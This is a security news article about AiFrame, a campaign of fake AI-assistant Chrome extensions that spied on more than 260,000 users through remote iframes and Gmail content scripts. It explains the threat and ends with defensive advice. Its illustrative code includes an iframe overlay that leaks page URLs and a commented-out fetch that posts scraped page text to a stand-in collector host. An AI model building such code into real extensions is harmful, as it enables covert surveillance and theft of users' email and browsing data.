Somebody Is Watching: AI Weaponizes Fake Chrome Extensions to Spy on Users


The promise of productivity has turned AI tools into effective lures for cybercriminals.

In February 2025, researchers at LayerX Security exposed AiFrame, a coordinated campaign of 30 malicious Chrome browser extensions impersonating well-known AI assistants, including ChatGPT, Claude, Gemini, and Grok.

More than 260,000 users installed the extensions, helped along by the fact that several earned the Chrome Web Store's coveted Featured badge. Appearing at the top of search results, these extensions seemed to offer AI summarization, writing assistance, and Gmail integration. In reality, they functioned as covert surveillance platforms.

“The campaign exploits the conversational nature of AI interactions, which has conditioned users to share detailed information,” said Natalie Zargarov, a LayerX researcher. “By injecting iframes that mimic trusted AI interfaces, they've created a nearly invisible man-in-the-middle attack that intercepts everything from API keys to personal data before it ever reaches the legitimate service.”

An Invisible Layer of Third-Party Control

Within the AiFrame campaign, rather than processing data locally, each extension rendered a full-screen browser iframe (inline frame), an HTML element that embeds an independent web page, document, or media (videos, maps, ads) inside the current page.

Since remote servers used by attackers controlled the iframes, this placed an invisible layer of third-party control over every website an affected user visited.
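The pattern LayerX describes can be sketched in a few lines. This is an illustrative reconstruction, not code from the actual extensions; the domain and query parameter are hypothetical stand-ins.

```javascript
// Minimal sketch of the remote-iframe pattern: the extension ships almost
// no logic, and the overlay's behavior is whatever the remote server
// chooses to serve at any given moment.

// Pure helper: build the attacker-controlled frame URL, leaking the
// current page's address as a query parameter.
function buildFrameUrl(remoteOrigin, pageUrl) {
  const u = new URL('/sidebar', remoteOrigin);
  u.searchParams.set('page', pageUrl); // page context leaks to the server
  return u.toString();
}

// Content-script side: overlay a full-screen iframe whose contents are
// served, and can be changed at any time, by the remote server.
function injectOverlay(remoteOrigin) {
  const frame = document.createElement('iframe');
  frame.src = buildFrameUrl(remoteOrigin, location.href);
  frame.style.cssText =
    'position:fixed;inset:0;width:100vw;height:100vh;border:0;z-index:2147483647;';
  document.body.appendChild(frame);
}

// The DOM call only makes sense inside a real page.
if (typeof document !== 'undefined') {
  injectOverlay('https://sidebar.example.invalid');
}
```

Because nothing malicious ships in the package, the reviewable code is just this thin loader.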

From there, the architecture allowed operators to extract readable page content, harvest entire Gmail threads and drafts, activate voice recognition, and collect behavioral telemetry—without triggering a Chrome Web Store update or review.

A Trojan Horse in Your Toolbar

This campaign reveals a disturbing structural weakness in how browser-extension marketplaces vet and monitor tools that delegate their core functionality to remote infrastructure. The campaign also raises urgent questions about whether current extension security models can keep pace with the AI gold rush.

Consider this commonplace scenario:

You install a Featured-badged AI sidebar extension to boost productivity, unaware that it is silently reading every email and webpage you open.

Jumping on the AI hype cycle, you have inadvertently created a dangerous new attack surface in your browser. And your security defenses can’t keep up.

Pretty scary, right?

The Anatomy of the AiFrame Campaign

LayerX Security researchers discovered the AiFrame campaign through a combination of AI-driven browser extension detection and code similarity analysis. The "extension spraying" strategy spread the campaign across 30 extensions with different names, branding, and IDs.

However, all 30 shared an identical codebase, and each communicated with subdomains of tapnetic[.]pro. To exploit brand trust, the extensions followed an impersonation playbook, mimicking ChatGPT, Claude, Gemini, Grok, and DeepSeek.

Here’s a rundown of the malicious extensions posing as popular AI assistants and tools with the most installs:

  • Gemini AI Sidebar - 80,000
  • AI Assistant - 50,000
  • AI Sidebar - 50,000
  • ChatGPT Translate - 30,000
  • AI GPT - 20,000
  • AI Sidebar - 9,000
  • Google Gemini - 7,000
  • ChatGPT - 1,000
  • DeepSeek Chat - 1,000
  • ChatGPT Translation - 1,000
  • ChatGPT for Gmail - 1,000

Instead of running AI logic locally, the extensions rendered a full-screen iframe from a remote, attacker-controlled domain. This enabled real-time changes to functionality, the silent deployment of new data-harvesting capabilities, and complete invisibility to install-time code review.

On top of that, the page content extraction mechanism used Mozilla's Readability library to scrape structured representations of any webpage a user visited, including authenticated and internal pages. The extraction mechanism also had voice recognition capability: it could remotely trigger speech-to-text via the Web Speech API, with transcripts returned to the cybercriminals.
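To make the extraction step concrete, here is a hedged sketch of how Readability-style page scrapes could be packaged for exfiltration. The payload fields and collector URL are hypothetical; LayerX did not publish the campaign's exact wire format.

```javascript
// `article` mirrors the shape returned by Mozilla Readability's parse():
// { title, textContent, ... }.
function buildExfilPayload(article, pageUrl) {
  return {
    url: pageUrl,
    title: article.title,
    // Truncate so each beacon stays small and inconspicuous.
    text: article.textContent.slice(0, 10000),
    capturedAt: Date.now(),
  };
}

// In the extension, this would run against the live page, e.g.:
//   const article = new Readability(document.cloneNode(true)).parse();
//   fetch('https://collector.example.invalid/ingest', {
//     method: 'POST',
//     body: JSON.stringify(buildExfilPayload(article, location.href)),
//   });
// Voice capture worked similarly: transcripts produced via the
// Web Speech API were posted back to the attackers' servers.
```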

The Gmail Espionage Module

As a high-value cyber target, Gmail can contain corporate communications, financial information, authentication tokens, and personal correspondence. In this campaign, 15 of the 30 extensions injected a dedicated content script at document_start on mail.google.com.
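That injection point corresponds to a standard declaration in a Chrome extension's manifest.json; a minimal fragment (the script filename is a hypothetical placeholder) would look like:

```json
{
  "content_scripts": [
    {
      "matches": ["https://mail.google.com/*"],
      "js": ["gmail.js"],
      "run_at": "document_start"
    }
  ]
}
```

Running at document_start means the script loads before Gmail's own page scripts, giving it first access to the DOM.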

From there, the script manipulated the Document Object Model (DOM), the programming interface for HTML and XML documents, to extract email thread text and draft content. It also harvested compose-window data: recipient addresses, subject lines, and body text.

At the social engineering layer, cybercriminals exfiltrated email content when users invoked seemingly helpful features, such as AI-powered summaries, auto replies, and translation. This all adds up to victims becoming active participants in their own surveillance.

Evading Detection—A Game of Whack-a-Mole

The campaign went through a removal and re-upload cycle resembling a Whack-a-Mole game. For example, after Google removed the Gemini AI Sidebar extension on February 6, a byte-for-byte identical clone was uploaded under a new ID just two weeks later.

Adding to the challenge, extension spraying makes takedowns ineffective. With 30 extensions, removing one barely dents the campaign.

And because Google awarded its Featured badge to a malicious extension, sending a trust signal, the browser giant essentially undermined user vigilance. Furthermore, by embedding telemetry and tracking pixels, the cybercriminals could monitor install and uninstall rates to optimize distribution.

Store Reviews Not Enough

To put this campaign into context, AiFrame joins a growing roster of extension campaigns (such as GhostPoster and a 16-extension ChatGPT credential-theft operation) that exploited the same structural blind spot. Unfortunately, static code analysis for extension vetting is limited by high false-positive rates.

This can cause alert fatigue, an inability to detect run-time-only issues, and poor comprehension of attacker intent. Static tools also often miss complex logic flaws, struggle with large codebases, and require extensive manual tuning.

Worse, there is a gap between install-time review and run-time behavior: when an extension's functionality is served from a remote server, the reviewed code is essentially a hollow shell. This differs from traditional malware in that no malicious payload ships in the extension package itself; all dangerous behavior originates from the iframe.
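Install-time review sees only an extension's declared surface. A static heuristic can flag a suspicious profile, but, as the hollow-shell problem shows, it cannot see what the remote iframe will later serve. A rough sketch of such a check, with rules and labels that are illustrative rather than any real vetting policy:

```javascript
// Heuristic: flag a parsed manifest.json whose declared surface matches
// the hollow-shell profile (broad host access, content scripts on
// sensitive origins). This catches the declaration, not the behavior.
function auditManifest(manifest) {
  const flags = [];
  const hosts = [
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  if (hosts.some((h) => h === '<all_urls>' || h.includes('*://*/'))) {
    flags.push('broad-host-access');
  }
  if (hosts.some((h) => h.includes('mail.google.com'))) {
    flags.push('targets-gmail');
  }
  return flags;
}
```

Even an extension that trips both flags can pass review if its packaged code looks benign, which is exactly the gap AiFrame exploited.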

The Path Forward—Recommendations and Defenses

Campaigns like AiFrame create a trust crisis. They erode confidence in the entire AI extension ecosystem, potentially slowing legitimate innovation. It’s critical for enterprises and end-users to conduct immediate risk assessments of their browsers by checking if any of the 30 identified extensions are installed.

Here are a few additional recommendations:

  • Individual users: audit installed extensions, scrutinize permissions, and use AI-provider apps rather than third-party wrappers.
  • Enterprises: deploy behavior-based extension monitoring, enforce allowlists, and strengthen run-time (not just install-time) enforcement.
  • Browser vendors: conduct runtime behavior monitoring and stricter reviews of extensions that load remote iframes while also enacting faster responses to re-upload evasion tactics.
  • Security teams: proactively hunt for threats in extension ecosystems as AI adoption accelerates.
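For the enterprise allowlist recommendation, the core check is straightforward: compare installed extension IDs against an approved list and a known-bad list. A sketch, with made-up IDs standing in for real ones:

```javascript
// Classify installed extensions: anything on the known-bad list should
// be removed; anything not explicitly approved should be reviewed.
function assessExtensions(installed, allowlist, knownBad) {
  const approved = new Set(allowlist);
  const bad = new Set(knownBad);
  return {
    remove: installed.filter((id) => bad.has(id)),
    review: installed.filter((id) => !bad.has(id) && !approved.has(id)),
  };
}
```

In practice, the installed-ID inventory would come from browser management tooling rather than being hand-listed.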

Affected users should also consider their Gmail communications fully compromised and reset their passwords. Enterprise exposure deserves particular attention: employees installing unvetted AI extensions on corporate browsers effectively create shadow AI that bypasses IT controls.

The Cost of Convenience

The AI extension boom will not slow down; neither will the attackers exploiting AI.

“What is new and concerning is how it’s being applied,” said Zargarov. “Attackers are now impersonating artificial intelligence interfaces and developer tools, places where users are conditioned to paste sensitive data without hesitation.”

As Zargarov points out, security teams and end-users need to realize that the promise of an AI productivity boost also brings the threat of surveillance tools. In the race to integrate AI into every corner of the browser, the browser industry must ensure that trust is not the price of convenience.

Author
  • Contributing Writer, Security Buzz
After majoring in journalism at Northeastern University and working for The Boston Globe, Jeff Pike has collaborated with technical experts in the IT industry for more than 30 years. His technology expertise ranges from cybersecurity to networking, the cloud, and user productivity. Major industry players Jeff has written for include Microsoft, Cisco, Dell, AWS, and Google.